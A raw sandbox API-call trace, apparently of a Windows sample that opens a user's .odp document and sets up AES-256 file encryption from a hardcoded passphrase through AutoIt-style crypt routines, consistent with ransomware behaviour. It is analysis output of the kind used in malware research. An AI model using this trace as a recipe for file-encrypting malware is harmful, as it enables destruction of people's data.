[0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0130.268] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0130.268] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0130.268] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6effd0b0, ftCreationTime.dwHighDateTime=0x1d5ecf1, ftLastAccessTime.dwLowDateTime=0xc3171260, ftLastAccessTime.dwHighDateTime=0x1d5f040, ftLastWriteTime.dwLowDateTime=0xc3171260, ftLastWriteTime.dwHighDateTime=0x1d5f040, nFileSizeHigh=0x0, nFileSizeLow=0x823f, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="b029yG4LTNtgmmqX_G.odp", cAlternateFileName="B029YG~1.ODP")) returned 0x41ac440 [0130.269] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0130.269] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0130.269] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0130.269] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0130.270] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0130.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392490 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0130.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0130.272] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0130.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cadd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0130.272] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\b029yg4ltntgmmqx_g.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0130.272] FreeLibrary (hLibModule=0x772d0000) returned 1 [0130.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca9d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0130.272] CloseHandle (hObject=0x258) returned 1 [0130.273] FreeLibrary (hLibModule=0x772d0000) returned 1 [0130.273] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0130.273] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\b029yG4LTNtgmmqX_G.odp", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6effd0b0, ftCreationTime.dwHighDateTime=0x1d5ecf1, ftLastAccessTime.dwLowDateTime=0xc3171260, ftLastAccessTime.dwHighDateTime=0x1d5f040, ftLastWriteTime.dwLowDateTime=0xc3171260, ftLastWriteTime.dwHighDateTime=0x1d5f040, nFileSizeHigh=0x0, nFileSizeLow=0x823f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="b029yG4LTNtgmmqX_G.odp", cAlternateFileName="B029YG~1.ODP")) returned 0x41ac180 [0130.273] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0130.273] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.273] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0130.273] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0130.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0130.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0130.273] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0130.274] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0130.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.274] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0130.274] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0130.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0130.274] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0130.274] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.274] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caeb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0130.275] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0130.275] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0130.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cb030, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0130.275] CryptHashData (hHash=0x41ac6c0, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0130.275] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.275] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0130.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0130.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43caee0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0130.275] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac6c0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb210 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0130.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0130.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 